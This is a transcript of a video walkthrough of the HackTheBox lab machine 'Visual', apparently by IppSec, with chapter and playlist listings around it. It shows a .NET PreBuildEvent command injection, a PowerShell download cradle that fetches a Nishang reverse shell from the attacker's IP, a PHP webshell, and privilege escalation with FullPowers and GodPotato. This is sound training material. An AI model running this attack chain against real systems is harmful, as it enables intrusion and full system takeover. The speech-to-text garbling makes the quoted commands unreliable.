HackTheBox - Visual
Key Takeaways
Exploits a .NET compiler using a pre-build event to inject malicious code and gain remote code execution
Full Transcript
what's going on YouTube this is IPC I'm doing visual from hack the box which gets its name because the web app is a service that remotely uses Visual Studio to compiled. net apppp so you can just upload your project file and then it will output the compiled binary however most compilers including Visual Studio have something called pre-build events that let you run code before the compiler does so you can sneak in command injection and get code execution on the box once you land on the box you realize you're not the web user so you switch over to the web user by dropping a shell in the web directory and that enables you to get to a service that has the SE impersonate privilege however it is disabled because you're just local service you can use the full Powers binary that uses a schedule task which restores all your capabilities and that lets you get SE impersonate where you can use the god potato which is the latest in potato attacks to escalate to Route so with all that being said let's just jump in as always we're going to start off with an end map so- SC for default scripts SV enumerate versions o a put all formats put in the end map directory and call it visual then the IP address of 1010 111234 this can take some time to run so I've already ran it looking at the results we have just one port open that is HTTP on Port 80 it's Banner tells us it's Apache running on a Windows Server which is a bit odd and that it also has PHP so this is definitely an odd combination for Windows I'm used to it being IIs and not allowing PHP but hey let's just go check out the website so I'm going to do HT P then the IP address of 1010 11234 and the banner tells us welcome to visual a revolutionary approach to visual studio project compilation with visual so I guess the Box's name is visual because it hosts Visual Studio on the back end and it also tells us they only support net 6.0 and C programs so make sure repo includes a sln file which is a solution file for successful compilation and scrolling down a little bit it wants us to submit a so what I'm going to do is stand up a web server real quick because I want to see what the request it makes back to us right so I'm going to do python 3-m HTTP server and then I'm going to say oros 10148 8,000 because that's where the HTTP server is listening and then we'll say IPC and um test because a lot of get likes username and then project so I want to make sure my thing um obeys that naming convention and then we see a build is being compiled please be patient and then looking back here we just see nothing yet so I'm going to give it some time um I like just waiting like a minute to see if anything happens I'm guessing it's going to happen before that minute's up but we'll see and the main thing I want to see is does it just make a request to theg folder and then pull the get file or is it going to use a different form of the git protocol because that's going to tell me what my next step is if it's just going in theg file and then pulling the repo that way then I can just build a repo and host it on this HTTP server if it does it through other methods I'm going to to stand up my own get repository for it to work and we can see the request does come in and we have it making a refs and says the service is get upload pack so this is actually taking advantage of a um get service right so my first thing is I just want to Google this to see if it's like standard RFC or specific to um maybe gogs G gitlab there's a lot of various git Reapers right and this just looks like it is going to be standard git so we can stand up any type of repository on our own and the easiest one I think is always going to be G or gogs um if I just do G dockerhub it will give us how to install it with Docker and I love using Docker for things like this because it just makes life so easy we don't have to like host anything on our box and well we host it on our box but we don't mess up our file system because it's all in a container so that way if we screw things up too much we just delete the container and move on with our lives right so I'm going to do a Docker pole g g because that's where the image was I already have it so it went really quickly so now all we have to do is a run so if I do docko run I'm going to do DD so it start detached I'm going to then do- P Port 300 3000 and what this is going to do is listen on my local host and for it to 3,000 on the container which is the default Port G T runs on um you could probably get that from here as well in this do compos file they're exposing 3,000 and they're also exposing Port 222 to 22 and the reason why these are different is because your local box probably is already listening on 22 so they do to 222 so it doesn't conflict with the SSH on your box right and that goes to the containers 22 so if we run this I'm also going to add a D- RM so as soon as I stop this container it deletes the image because we don't need to store any of the files we see it just gives us the hash and now if I do Local Host Port 3,000 we have a g instance I'm just going to click install G and then we can register an account soon as it's up right we have it loading there where it user login let's create our account I'll say IPC root atp. Ro password of password then we register the account and now we're in so all I have to do is create a repository now and I'll create this name um please subscribe create it and then if we do a get clone here we have our repo right so the next thing it wanted us to do is create AET um project file right and my box is kind of lucky because I already had net installed and it's version 7 which the server did have um but if you were to do this now um You may install net 8 which would not work on the server and it's a real pain to manage multiple versions of net just locally there's probably a good way to do it I don't really know how um the easiest way I know is to use Docker right so I want to install a Docker container that's only using net 6 because that's what the website tells us but if you had Net 7 would also work um probably net one through or two through five would also work because it's backwards compatible but let's just do um Microsoft docker doet 6. now let's see what this does uh let's see net runtime let's see there we go so we can do this Docker pole command and my box already says I have it so it just went quickly it probably take a minute for you and since we have this runtime now we can do a Docker run and then I'm going to specify Das it for interactive I'm going to do DV for volume I'm going to share my current working directory with SL Mount um specify oh did not want to do that let's copy this then we want to say the runtime 6.0 and then I think I just do bash and it will put me at a prompt there we go so here I have my container if I go to Mount it's shared with my host right now so what that's going to allow me to do is all the net commands to um make a project right so the first thing you want to do is net new console uh command not oh um net console new net help that is weird cdnet new console no. net sdks were found I'm in the net container uh Docker images so instead of doing the runtime we want to do the SDK so when you went to the poll replace SD uh replace runtime with SDK and that should work so if we do net new console here there we go um that SDK is software development kit runtime is just so you can run net applications right so it makes sense why we needed the SDK so now that we have the project um we can cat it to see what this looks like it's just going to point us to net 6.0 and then the program.cs file is just a hello world if I do netrun it will compile this application and run it awesome uh the next thing we need to do is make that sln file because the website tells us um we need it the solution file so if I just do net new sln it says the solution file was created and if I just cat it it doesn't tell us um it doesn't link to a current CS project file right so what we want to do is sayet sln help and it's going to say we want to give it the solution file then we can do add and give it the project file so let's do net sln the sln file which is mount. sln I probably should have made this a different name it's just taking the mount because that's the directory we're in but it doesn't really matter what the name is it's just going to be a little bit confusing so what we did is give the sln file add the Cs project file and we see it has been added to the solution so now if I go to my Please Subscribe directory we have the visual Studio Pro uh directory I'm going to make a get ignore file and we're going to ignore bin an object because those are just there because I did the net run Command right we could show that real quick so if I do rm- RF bin and obge those don't exist net run and it's going to create those directories and like bin we see that's where the executable actually exist right I think it's in Mount uh it's probably this is the executable I'm guessing let's do a file against it uh we don't have that we can just do it on our host uh debug Elf oh it's an elf file because we're on Linux I did not expect that I thought it was going to be an exe U mount. CSR our format is EXE find. Dame start.exe I guess it made an elf file um I don't think that matters too much so let's see the next step we need to do is uh get add dot to add all the files to the git repo we can commit U give it the message doesn't really matter here I'm going to say initial commit then we can get push and then put our g t credentials and now on g t all the files will be here so if I refresh we have our project um we have the solution file the Cs project file and program so now let's copy this and then we'll go back here and do HTTP 3000 then IPC Please Subscribe and before I do that I want to get logs of our G instance so if I do um Docker logs B25 c 7 8 b257 uh four five there we go um this is going to give me standard out of this container so I'm just going to do a-f to follow hit enter a few times then we're going to send this and we can wait probably a minute for the Ser to make a request to us and I guess while this goes we can talk about what the next step is because it kind of take some time um the project file is going to tell the um compiler what to do and there are some dangerous options in this uh whenever you open like a project from somewhere you don't trust it asks do you trust this repository because if you don't it's not going to run a lot of the things things one of the most dangerous ones is called a pre-build event um I'm just going to Google pre-build event. net and that should get me to what I want let's see here's the documentation and let's see what it is so this is how you can do uh call it so we give a Target name pre-build pre-build event we could also do it without the target um so we could just call it like in the property group this says read only let's get out of here so it's not read only U maybe I could do uh pseudo V mount. CSR okay now I can write so if I do preu event we can run a command here so I'm just going to say um touch ped and we're going to end it prebuild event like this and then if we go back to the docker container and we can see the web server made a request to us um we'll look at the output of the web server in just a minute but back on the doc container if I look at this there's a pre-built event right so if I do a f sl- did I call ited yeah I dided we don't that doesn't exist anywhere right so now I do net run and it's going to print hello world I do dame pwned it now exists because it ran this before it built and you may think this is like a vulnerability what is a legitimate use case for this and there's a lot of times when you just want to do things um before for instance I mostly use this when writing like c2s because I'll if I'm not using a malleable config if you don't know what that is just go to ip. ro type malleable config and watch that video but let's say I'm creating a um file and I have config Doh I really hate Docker sometimes because it doesn't have V I could like Define a variable let's say um decryption key and I want this to be in encrypted right but I don't want to like always put that encrypted text here I want this to be easily changeable right so what I would do is um just leave that blank and then put a comment here and then I could say um decrypt and then the plain text here so I would have a pre-build event of bash Powershell whatever looking for all comments that have decrypt colon and then text and then what it would do is oh I see this plain text now I'm going to put the encrypted value here and of course the compiler is always going to remove all comments so that doesn't make it into the executable and what you're left with is just a bunch of encrypted things and decryption key is a bad one we could say like um C2 URL or something right and that way you don't have plain text strings in your executable because the uh pre-build event takes the plain text and always puts the encrypted value in there right and I know what you're thinking now that's not really a legitimate use case because we're using this for malware right well I do like a lot of grpc stuff with goang and that's another time where I would use this right I think I have a example here um let's see Proto example so in goang if you do like grpc you're probably used to having these protuff files right and this is just a simple config that um you run through a program to create essentially a header file that gives you a lot more functions right this is going to stand up a RPC service named greeter and then it has two functions say hello and say hello again and hello is going to take in a hello request which has the variable name hello again uh pretty much the same thing and that's how it returns right hello reply so what we do here is we just do protoc c and then give it the Proto file and I think go out there we go thank God it did not error and that automatically generates this code so if I do a less against it we can see it's creating a bunch of magic for us we have like the reset function the string it just is a lot of code here right and every time the protobot file updates we have to run that protoc c command so if we just wanted to have the um program compile the protoc C command before building the go program we would use a pre-build event right so that is one of the more legitimate use cases for it um hopefully that all makes sense and you enjoy that tangent always let me know in the comments if you do um so let's see where were we okay we want to see what the website said so it says your build failed here are the lines with errors um if we go to toggle code scroll all the way down let's see so it looks like it actually wants something in the object so what I'm going to do is undo the get ignores and just give it this object directory because it's trying to get this project asset. Json file I'm guessing maybe this requires internet or something and it needs it the other thing I'm noticing is the SDK is 7.0 so maybe I want to switch to seven instead of six but first things first let us just um whoops edit that get ignore that's what I want to do so I'm going to remove the object get add dot get commit DM add objdir get push and we can see we added that project assets. Json which it was looking for and now we will go ahead and redo this right if we go back here it already saved submit it and then I'm going to hit enter a few times so we know when the server hits us and I think I can exit the doc container I don't think I need it anymore so let us now edit the mount CS project and we want to um run a more dangerous command than pwned right so what I'm going to do is copy um let's do copy user share Nang uh shells invert is it Powershell DCP online. PS1 and I'm going to put it in dubdub duub and call it rev. PS1 okay and let's edit this and I take this one line and we want to put our IP here so 10 10 148 901 because that's where the shell is going to listen and then what I'm also going to do is um use a web Cradle to access this file we could just cat rev. PS1 I convert to utf16 little Indian and then base 64- w0 um I thought we could Let's see we a to convert why I convert DT utf16 little andian okay there's no dash there I thought there was utf16 dle but maybe not and the reason why I do this is this is how Powell likes encoding um we could do B 64- w0 and pass this as the encoder command the reason why I'm not and want to use a web cradle is if Defender Flags this I'll never know but if we use a web cradle then the server will make a request to us and if we don't get the shell we know Defender probably stopped it right so I like having the server to reach back to us first that way we know um if we're getting flagged by antivirus so let's do a uh I'm just going to do it in a file so we'll call it web cradle and we can say new object net. webclient download string HTTP 10 1048 um 8000 rev. PS1 I can't remember if I want this in double quotes or single quotes I think d uh single quotes would be just fine so let's do a cat command again we'll do the web Creator there we go copy this go to our um CS project file and then we can say this we have to do this with Pudo I should just like take ownership of this file so we no longer have to so we can do Powershell DC the base 64 and the whole reason why I'm using B 64 here is I hate dealing with a bunch of quotes and things I don't know because they can break unexpected things so whenever I can use base 64 I like doing it um so now that we have that oh the code still errored even after we did it or did we forget to push um oh so this time it errored because Windows doesn't know the touchone command that's interesting right so we get the output of our Command in that so let's see what we want to do let's make sure we have this that looks good so I can say get add dot get command - M add malicious um prebuild get push so now our latest is up there hit enter a few times we can go back hit submit and then we want to stand up a web server and they also want to listen on Port 901 so ideally we should see a request come in and then we would next see the shell so let's see if that is what happens there we go we have it hitting our service so the next thing hopefully it makes a request to us if it doesn't do that then our issue is in the web cradle going back here it still says our build is being compiled so um hopefully everything's working but I'm starting to lose hope right now because um I expected the web Creator to be hit well it still says compiled so maybe it takes a while to do the get pole in the um clone oh there we go so we had it hit and then we got a reverse shell connection here right so awesome um the one thing I wish I did was RL WP this netcat uh command so like I could clear the screen and do other things but um oh well so if we do who am I we are the Eno user we could also do who am iall to see what privileges we have and what groups we're member of and it doesn't really look like anything interesting here um let's see get process is that going to be po shell to do that let's see what we have my main thing I want to do is see if Eno is the one running this web server I'm guessing not but let's see get process include owner this should be it let's see get process so if we do get process and specify it was like Apache right um HTTP there we go httpd like that and I'm going to copy this command okay then we want to select object name that's a process name um image username convert to Json this is ugly using wmi but let's try it so if I Echo earners now I don't know if that worked so I don't know I don't think we can see who owns the process we can only see um ourselves so we know Eno is running Powershell Powershell nssm this is nonsucking service manager that is a funny name for like a legitimate thing um it's just like a service binary rapper for Windows to make it easy making Services right the non sucking service manager the first time I saw that I was like oh man that is one troll name but we see conhost and CMD so by that logic the HTTP server is running as a different user because we can't see the user so let's see if we can escalate to that right so whenever I land on a web server I want to see if I can write um files so I'm going to echo. pH or let's Echo a webshell let's do PHP like this and we'll say PHP info like that [Music] to.php and we didn't error and we can see we wrote the file so now if I go to 101 11234 p. PHP we don't get anything which is odd we see the PHP tag but it did not execute and what's happening here is really odd um I wonder if it will work if I just curl this we don't need any of that stuff so I'll do curl 10 10 11234 pphp xxd and what we see is because we created this in um Powershell it's going to be utf16 little Lan encoded um and we also got these bites here which I don't think is screwing things up but the Apache module is only looking for um an encoded things so this null bite here is screwing things up so when we create the p. PHP we have to um make sure encoding is right so let's go copy our Echo command again and then we can say out file.php and encoding um asky so now when I run this command uh it get a lot more output because it's no longer UTF encoded and we have the PHP info output right so now if I just get rid of this view source and view it that works so whenever you're on Windows if you're chopping a webshell and it's not working as you expect it's probably going to be an encoding issue right so now we have PHP info let's actually just get a shell it should be easy now so let's do um the echo command again and then we can say system request CMD like that awesome and then we'll write the outfile just like we did before refresh the page it's going to erir because it says it wants the variable CMD and we did not supply it so if I do CMD equals who am I we are ENT Authority local service if we do who am i/ all uh let's do it and view source so line breaks are treated it looks very similar to this but because we're local service we can actually escalate to um get SE impersonate privilege most likely so let's get a interactive shell here real quick so I'm going to go to a new Pane and this time I'm not going to forget to run ourl WP which just improves the reverse shell slightly for Windows right it gives me the up and down arrows so we listed on 90001 and then let's just use our web cradle again do we still have the web server up we don't um let's start it and then if I cat please subscribe um Mount CSR we can grab this Powershell file okay so we do CMD is equal to or oneliner and then go back over here and we have a river shell and we are the local service user so um let's see try and remember the name let's see net GitHub um full privilege let's see that's not the name restore all privileges local service and quotes there we go full Powers is what the name of this is um I'm sure if I searched hack tricks long enough I would find a reference to it but a lot of Windows pen testing is just knowing what tools are available to you and what's Happening Here is um when you're local service Windows is downgrading your tokens so you don't have a lot of dangerous permissions what this is doing is creating a schedule task because when the schedule task happens then windows for some reason doesn't downgrade your token to have less Privileges and you get them all restored back right so that's what this is just going to automate for us so I'm going to go ahead and download full Powers let's see download let's put it in uh this Box's name is visual we'll put it right in dubdub duub okay and then I'm going to get a program data because this is normally World writable and we can say uh curl 101 we probably need to do http 10 10 148 8,000 uh it's probably full powers. exe and we'll name it full powers. exe so if I do a dir we have that binary if I try to execute it and then we do Who Am iall it didn't do anything but something odd happened I'm not sure if you noticed so let's try this again let's do full powers. exe and it starts the dummy thread we create the schedule task we get the new token we create a process as the user we have this shell here and then we drop back to Powershell so our shell is screwing something up if we just use netcat for a shell that would have worked for us but I really don't like using netcat um if I don't have to and the default PHP shell I'm used to using if we do user share lawn num um PHP PHP reverse shell this one is only supporting Linux soon as you run the shell it runs this command and then it would crash because it doesn't support Windows however if we Google PHP reverse shell um I'm going to Google Ivan because that's the Creator it I forget his exact handle but this brings me to this reverse shell and this is a much better reverse shell than it he credits um the original script here but now it supports Linux Mac and windows so this is one I would definitely recommend um saving because it's just a really nice reverse shell to have if you're on a PHP box so let's download this file and I'm going to rename it to rev. PHP um we did not rename it there we go and then we want to go to the bottom and say ell is going to be 10 10 148 or 9,1 okay let's see I'm going to do RL RP NC lvmp 901 and we want to get back to the web directory right let's see where is it h let's just run the command here if I just restart this shell will be in the HD doc so I can curl HTTP 10 1048 Port 8000 rev. PHP rev. PHP okay so let's stand up a netcat listener and now all I want to do is hit the rev. PHP file I just uploaded and we have a reverse shell here and we're not in poers Shell um but this reverse shell is a bit better I don't know exactly why the oneliner reverse shell doesn't work but by now Run f Powers we see this time it doesn't say something after system 32 we do a Who Am iall we have the personate privilege um I'm going to exit that we can do because I forgot to show right off the start get it again who am I SL all we still only had those three privileges to start out right it's not like the um PHP shell did anything differently other than how it gave us the shell so execute this and with sem personate privilege escalation is pretty simple we just have to know the latest potato to use um it started out like I don't remember all the potatoes it seems like every year or two a new one is created because Microsoft patches the method um I think God potato is the latest one right now um there's also I think local potato which works like there's just so many there's like juicy potato there was one after that there's Rogue potato there's all the types of potatoes but I'm going to use God potato for this and let's see we just want to download got potato we'll say net 4 I'm going to rename it so it's a bit easier to type and all we do is the command we want to run so let's see how do we want to do this let's go back to um program data and we can make sure and dubdub dub we have godp potato. exe and we're going to curl HTTP 10 1048 8,000 God potato output it to a file and then we execute it and we say- CMD it says CMD SL C and the command we want to run so let's do a poell oneliner again uh grab it from the Cs project file grab this okay and that should be it we run it it's hanging and we failed because we're not listening on a port so there we go now we're listening and boom we get a shell who am I now we're the system account over on this one we were service which isn't system this one is local system so now I can go users administrator uh it's in desktop probably and we can get root. text right so that is going to be the Box hope you guys enjoyed it take care and I will see you all next time
Original Description
00:00 - Introduction
00:50 - Start of nmap
02:00 - Examining the request the server makes to us
04:15 - Using docker to run a Gitea Instance
06:20 - Using docker to install a DotNet Container (make sure its the SDK!)
09:00 - Using the dotnet CLI to create a project and adding a solutions file to it
13:00 - Having the webapp download our repo, then looking at PreBuildEvents to execute commands before it is compiled
16:00 - Talking about why this PreBuildEvent exists
19:20 - Looking at why our build failed
21:30 - Adding a nishang reverse shell to the prebuild event
26:40 - Reverse Shell Returned!
29:45 - Writing a webshell as Enox, to get a shell as the Apache Service User
34:00 - Using FullPowers to restore our tokens while will enable the SeImpersonate privilege
36:00 - Grabbing a good PHP Reverse Shell Script that supports Windows!
39:15 - Using GotPotato to abuse the SeImpersonate Privilege and run code as system
Watch on YouTube ↗
(saves to browser)
Sign in to unlock AI tutor explanation · ⚡30
Playlist
Uploads from IppSec · IppSec · 0 of 60
← Previous
Next →
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
HHC2016 - Analytics
IppSec
HackTheBox - October
IppSec
HackTheBox - Arctic
IppSec
HackTheBox - Brainfuck
IppSec
HackTheBox - Bank
IppSec
HackTheBox - Joker
IppSec
HackTheBox - Lazy
IppSec
Camp CTF 2015 - Bitterman
IppSec
HackTheBox - Devel
IppSec
Reversing Malicious Office Document (Macro) Emotet(?)
IppSec
HackTheBox - Granny and Grandpa
IppSec
HackTheBox - Pivoting Update: Granny and Grandpa
IppSec
HackTheBox - Optimum
IppSec
HackTheBox - Charon
IppSec
HackTheBox - Sneaky
IppSec
HackTheBox - Holiday
IppSec
HackTheBox - Europa
IppSec
Introduction to tmux
IppSec
HackTheBox - Blocky
IppSec
HackTheBox - Nineveh
IppSec
HackTheBox - Jail
IppSec
HackTheBox - Blue
IppSec
HackTheBox - Calamity
IppSec
HackTheBox - Shrek
IppSec
HackTheBox - Mirai
IppSec
HackTheBox - Shocker
IppSec
HackTheBox - Mantis
IppSec
HackTheBox - Node
IppSec
HackTheBox - Kotarak
IppSec
HackTheBox - Enterprise
IppSec
HackTheBox - Sense
IppSec
HackTheBox - Minion
IppSec
VulnHub - Sokar
IppSec
VulnHub - Pinkys Palace v2
IppSec
HackTheBox - Inception
IppSec
Vulnhub - Trollcave 1.2
IppSec
HackTheBox - Ariekei
IppSec
HackTheBox - Flux Capacitor
IppSec
HackTheBox - Jeeves
IppSec
HackTheBox - Tally
IppSec
HackTheBox - CrimeStoppers
IppSec
HackTheBox - Fulcrum
IppSec
HackTheBox - Chatterbox
IppSec
HackTheBox - Falafel
IppSec
How To Create Empire Modules
IppSec
HackTheBox - Nightmare
IppSec
HackTheBox - Nightmarev2 - Speed Run/Unintended Solutions
IppSec
HackTheBox - Bart
IppSec
HackTheBox - Aragog
IppSec
HackTheBox - Valentine
IppSec
HackTheBox - Silo
IppSec
HackTheBox - Rabbit
IppSec
HackTheBox - Celestial
IppSec
HackTheBox - Stratosphere
IppSec
HackTheBox - Poison
IppSec
HackTheBox - Canape
IppSec
HackTheBox - Olympus
IppSec
HackTheBox - Sunday
IppSec
HackTheBox - Fighter
IppSec
HackTheBox - Bounty
IppSec
Related AI Lessons
⚡
⚡
⚡
⚡
Qwen 3.6 27B Is the Local Dev Sweet Spot — Here's Why
Dev.to · Carter May
Deploying Spring Petclinic Microservices with Docker Compose: An End-to-End DevOps Deployment Experience
Dev.to · Nice Nwogu
Qwen 3.6 27B Is the Local Dev Sweet Spot — Here's Why
Dev.to · Carter May
Terraform Seems Annoying. But It’s Just Saving You.
Medium · DevOps
Chapters (15)
Introduction
0:50
Start of nmap
2:00
Examining the request the server makes to us
4:15
Using docker to run a Gitea Instance
6:20
Using docker to install a DotNet Container (make sure its the SDK!)
9:00
Using the dotnet CLI to create a project and adding a solutions file to it
13:00
Having the webapp download our repo, then looking at PreBuildEvents to execute
16:00
Talking about why this PreBuildEvent exists
19:20
Looking at why our build failed
21:30
Adding a nishang reverse shell to the prebuild event
26:40
Reverse Shell Returned!
29:45
Writing a webshell as Enox, to get a shell as the Apache Service User
34:00
Using FullPowers to restore our tokens while will enable the SeImpersonate pri
36:00
Grabbing a good PHP Reverse Shell Script that supports Windows!
39:15
Using GotPotato to abuse the SeImpersonate Privilege and run code as system
🎓
Tutor Explanation
DeepCamp AI